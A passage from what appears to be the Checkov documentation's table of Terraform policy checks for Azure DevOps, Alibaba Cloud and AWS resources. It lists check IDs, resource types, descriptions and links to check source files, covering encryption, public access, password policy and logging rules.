[ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | -| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | -| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | -| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | -| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | -| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | -| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | -| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | -| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | -| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | [OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) | -| 12 | CKV_ALI_11 | resource | alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) | -| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) | -| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) | -| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) | -| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) | -| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) | -| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one lowercase letter | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) | -| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) | -| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) | -| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) | -| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) | -| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) | -| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) | -| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM enforces MFA | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) | -| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) | -| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) | -| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) | -| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) | -| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) | -| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) | -| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | [K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) | -| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) | -| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) | -| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) | -| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) | -| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) | -| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) | -| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | [MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) | -| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) | -| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) | -| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) | -| 43 | CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) | -| 44 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | -| 45 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | -| 46 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) | -| 47 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | -| 48 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | -| 49 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 50 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 51 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) | -| 52 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 53 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 54 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) | -| 55 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) | -| 56 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) | -| 57 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) | -| 58 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) | -| 59 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) | -| 60 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) | -| 61 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) | -| 62 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | -| 63 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | -| 64 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) | -| 65 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | -| 66 | CKV_AWS_19 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | -| 67 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | -| 68 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | -| 69 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | -| 70 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | -| 71 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is encrypted at rest using KMS CMK | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) | -| 72 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 73 | CKV_AWS_23 | resource | aws_elasticache_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 74 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 75 | CKV_AWS_23 | resource | aws_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 76 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 77 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 78 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 79 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 80 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 81 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 82 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 83 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 84 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 85 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) | -| 86 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) | -| 87 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) | -| 88 | CKV_AWS_29 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | -| 89 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | -| 90 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) | -| 91 | CKV_AWS_32 | resource | aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) | -| 92 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) | -| 93 | CKV_AWS_34 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) | -| 94 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) | -| 95 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) | -| 96 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) | -| 97 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) | -| 98 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) | -| 99 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 100 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 101 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 102 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) | -| 103 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) | -| 104 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) | -| 105 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) | -| 106 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) | -| 107 | CKV_AWS_46 | resource | aws_instance | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 108 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 109 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 110 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | 